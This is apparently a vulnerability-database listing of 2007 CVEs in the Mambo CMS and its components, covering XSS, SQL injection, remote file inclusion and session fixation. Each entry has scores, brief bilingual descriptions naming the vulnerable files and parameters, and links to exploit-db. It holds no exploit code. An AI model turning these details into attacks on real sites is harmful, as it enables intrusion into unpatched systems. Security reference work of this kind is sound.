CVSS: 6.1EPSS: 2%CPEs: 1EXPL: 1CVE-2007-6455 – Mambo 4.6.2 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities
https://notcve.org/view.php?id=CVE-2007-6455
20 Dec 2007 — Multiple cross-site scripting (XSS) vulnerabilities in index.php in Mambo 4.6.2 allow remote attackers to inject arbitrary web script or HTML via the (1) Itemid parameter in a com_frontpage option and the (2) option parameter. Múltiples vulnerabilidades de secuencias de comandos en sitios cruzados (XSS) en index.php de Mambo 4.6.2 permite a atacantes remotos inyectar secuencias de comandos web o HTML de su elección mediante los parámetros (1) Itemid en una opción com_frontpage y (2) option. • https://www.exploit-db.com/exploits/30899 • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •
CVSS: 9.1EPSS: 0%CPEs: 3EXPL: 2CVE-2007-5362 – Joomla! Component mosmedialite451 - Remote File Inclusion
https://notcve.org/view.php?id=CVE-2007-5362
11 Oct 2007 — Multiple PHP remote file inclusion vulnerabilities in the Avant-Garde Solutions MOSMedia Lite (com_mosmedia) 4.5.1 component for Mambo and Joomla! allow remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter to (1) credits.html.php, (2) info.html.php, (3) media.divs.php, (4) media.divs.js.php, (5) purchase.html.php, or (6) support.html.php in includes/. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information... • https://www.exploit-db.com/exploits/4499 • CWE-94: Improper Control of Generation of Code ('Code Injection') •
CVSS: 9.8EPSS: 0%CPEs: 2EXPL: 2CVE-2007-5177 – Mambo Component Mambads 1.5 - SQL Injection
https://notcve.org/view.php?id=CVE-2007-5177
03 Oct 2007 — SQL injection vulnerability in index.php in the MambAds (com_mambads) 1.5 and earlier component for Mambo allows remote attackers to execute arbitrary SQL commands via the caid parameter. Vulnerabilidad de inyección SQL en index.ph pdel componente MambAds (com_mambads) 1.5 y anteriores para Mambo permite a atacantes remotos ejecutar comandos SQL de su elección a través del parámetro caid. • https://www.exploit-db.com/exploits/4469 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
CVSS: 6.1EPSS: 0%CPEs: 2EXPL: 0CVE-2007-4745
https://notcve.org/view.php?id=CVE-2007-4745
06 Sep 2007 — Multiple cross-site scripting (XSS) vulnerabilities in the AkoBook 3.42 and earlier component (com_akobook) for Mambo allow remote attackers to inject arbitrary web script or HTML via Javascript events in the (1) gbmail and (2) gbpage parameters in the sign function. Múltiples vulnerabilidades de secuencias de comandos en sitios cruzados (XSS) en el componente AkoBook 3.42 y versiones anteriores (com_akobook) para Mambo, permiten a atacantes remotos la inyección de secuencias de comandos web o HTML de su el... • http://osvdb.org/37533 • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •
CVSS: 9.8EPSS: 0%CPEs: 2EXPL: 1CVE-2007-4505 – Mambo Component Remository - 'cat' SQL Injection
https://notcve.org/view.php?id=CVE-2007-4505
23 Aug 2007 — SQL injection vulnerability in index.php in the RemoSitory component (com_remository) for Mambo allows remote attackers to execute arbitrary SQL commands via the cat parameter in a selectcat action. Vulnerabilidad de inyección SQL en index.php del componente REmoSitory (com_remository) para Mambo permite a atacantes remotos ejecutar comandos SQL de su elección a través del parámetro cat en una acción selectcat. • https://www.exploit-db.com/exploits/4306 •
CVSS: 9.8EPSS: 0%CPEs: 3EXPL: 2CVE-2007-4456 – Mambo Component SimpleFAQ 2.11 - SQL Injection
https://notcve.org/view.php?id=CVE-2007-4456
21 Aug 2007 — SQL injection vulnerability in index.php in the SimpleFAQ (com_simplefaq) 2.11 component for Mambo allows remote attackers to execute arbitrary SQL commands via the aid parameter. NOTE: it was later reported that 2.40 is also affected, and that the component can be used in Joomla! in addition to Mambo. Una vulnerabilidad de inyección SQL en el archivo index.php en el componente SimpleFAQ (com_simplefaq) versión 2.11 para Mambo, permite a atacantes remotos ejecutar comandos SQL arbitrarios por medio del pará... • https://www.exploit-db.com/exploits/4296 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
CVSS: 9.8EPSS: 0%CPEs: 1EXPL: 0CVE-2007-4203
https://notcve.org/view.php?id=CVE-2007-4203
08 Aug 2007 — Session fixation vulnerability in Mambo 4.6.2 CMS allows remote attackers to hijack web sessions by setting the Cookie parameter. Vulnerabilidad de fijación de sesión en Mambo 4.6.2 CMS permite a atacantes remotos secuestrar sesiones web estableciendo el parámetro Cookie. • http://osvdb.org/42514 • CWE-287: Improper Authentication •
CVSS: 7.8EPSS: 0%CPEs: 1EXPL: 0CVE-2006-7202
https://notcve.org/view.php?id=CVE-2006-7202
09 May 2007 — The dofreePDF function in includes/pdf.php in Mambo 4.6.1 does not properly check access rights for database content, which allows remote attackers to read certain content via unspecified vectors. La función dofreePDF en includes/pdf.php de Mambo 4.6.1 no comprueba adecuadamente los derechos de acceso a contenido de base de datos, lo cual permite a atacantes remotos leer cierto contenido mediante vectores no especificados. • http://secunia.com/advisories/25039 •
CVSS: 4.9EPSS: 0%CPEs: 1EXPL: 0CVE-2007-2557
https://notcve.org/view.php?id=CVE-2007-2557
09 May 2007 — MOStlyDB Admin in Mambo 4.6.1 does not properly check privileges, which allows remote authenticated administrators to have an unknown impact via unspecified vectors. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information. MOStlyDB Admin en Mambo 4.6.1 no validad de forma adecuada los privilegios, lo cual permite a administradores remotos validados tener un impacto desconocido a través de vectores no especificados. NOTA: la procedencia de esta inform... • http://osvdb.org/35540 •
CVSS: 9.8EPSS: 9%CPEs: 2EXPL: 3CVE-2007-2317 – TOSMO/Mambo 1.4.13a - 'absolute_path' Remote File Inclusion
https://notcve.org/view.php?id=CVE-2007-2317
26 Apr 2007 — Multiple PHP remote file inclusion vulnerabilities in MiniBB Forum 1.5a and earlier, as used by TOSMO/Mambo 4.0.12 and probably other products, allow remote attackers to execute arbitrary PHP code via a URL in the absolute_path parameter to bb_plugins.php in (1) components/minibb/ or (2) components/com_minibb, or (3) configuration.php. NOTE: the com_minibb.php vector is already covered by CVE-2006-3690. Múltiples vulnerabilidades de inclusión remota de archivo en PHP en MiniBB Forum 1.5a y anteriores, utili... • https://www.exploit-db.com/exploits/3707 •